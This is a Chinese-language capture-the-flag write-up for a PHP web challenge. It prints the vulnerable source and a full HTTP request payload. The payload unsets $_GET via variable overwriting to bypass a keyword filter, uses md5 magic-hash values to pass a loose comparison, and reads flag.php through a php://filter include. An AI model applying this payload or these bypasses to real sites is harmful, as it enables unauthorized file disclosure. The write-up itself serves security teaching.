<?php
function waf($a)
{ foreach($a as $key => $value)
{ if(preg_match('/flag/i',$key))
{
exit('are you a hacker'); } } }
foreach(array('_POST', '_GET', '_COOKIE') as $__R) { if($$__R) { foreach($$__R as $__k => $__v) { if(isset($$__k) && $$__k == $__v) unset($$__k); } } } if($_POST) { waf($_POST);} if($_GET) { waf($_GET); } if($_COOKIE) { waf($_COOKIE);} if($_POST) extract($_POST, EXTR_SKIP); if($_GET) extract($_GET, EXTR_SKIP); if(isset($_GET['flag'])){ if($_GET['flag'] === $_GET['daiker']){ exit('error'); } if(md5($_GET['flag'] ) == md5($_GET['daiker'])){ include($_GET['file']); } } ?>
这题刚上来先进行这一步操作
foreach(array('_POST', '_GET', '_COOKIE') as $__R) { if($$__R) { foreach($$__R as $__k => $__v) { if(isset($$__k) && $$__k == $__v) unset($$__k); } }
典型的变量覆盖代码 继续往下开
if($_POST) { waf($_POST);} if($_GET) { waf($_GET); } if($_COOKIE) { waf($_COOKIE);}
然后
if($_POST) extract($_POST, EXTR_SKIP); if($_GET) extract($_GET, EXTR_SKIP);
看下面能文件包含的条件
if(isset($_GET['flag'])){ if($_GET['flag'] === $_GET['daiker']){ exit('error'); } if(md5($_GET['flag'] ) == md5($_GET['daiker'])){ include($_GET['file']); } }
有个$_GET['flag'] 然而waf函数中
if(preg_match('/flag/i',$key)){ exit('are you a hacker'); }
?flag=xxx 就会触发waf规则,如果我们向
index.php?x=123
提交一个POST请求内容为
_GET[x]=123
因为?x=123
所以$_GET内容为
array('x'=>'123')
当开始遍历$_POST的时候$__k是_GET[x],所以$$__k就是$_GET[x]也就是array('x'=>'123'),$__v是POST上来的一个数组,内容也是array('x'=>'123'),$$__k == $__v成立所以我们的超全局变量$_GET就被unset了
所以GET flag=xxxxx 就不会触发waf 了 因为还没进waf函数 GET就呗unset了
所以看一下给出的payload
POST /index.php?flag=QNKCDZO&daiker=s878926199a&file=php://filter/read=convert.base64-encode/resource=flag.php HTTP/1.1 Host: 119.23.73.3:5101 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8 Cookie: PHPSESSID=om11lglr53tm1htliteav4uhk4 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 112 _GET[flag]=QNKCDZO&_GET[daiker]=s878926199a&_GET[file]=php://filter/read=convert.base64-encode/resource=flag.php
GET的作用就是用来在循环中配合POST 然后让循环操作把GET给在unset掉
而POST内容虽然存在flag关键字 在进waf函数之前var_dump一下
array(1) { ["_GET"]=> array(3) { ["flag"]=> string(7) "QNKCDZO" ["daiker"]=> string(11) "s878926199a" ["file"]=> string(6) "11.txt" } }
而waf函数
function waf($a){ foreach($a as $key => $value){ exit('are you a hacker'); } }
POST的所有$key都是_GET $value是个array 所以POST不会触发waf函数
在下面的操作中 所以 POST里的变量 又转换成了GET的 然后进入if函数
if($_POST) extract($_POST, EXTR_SKIP);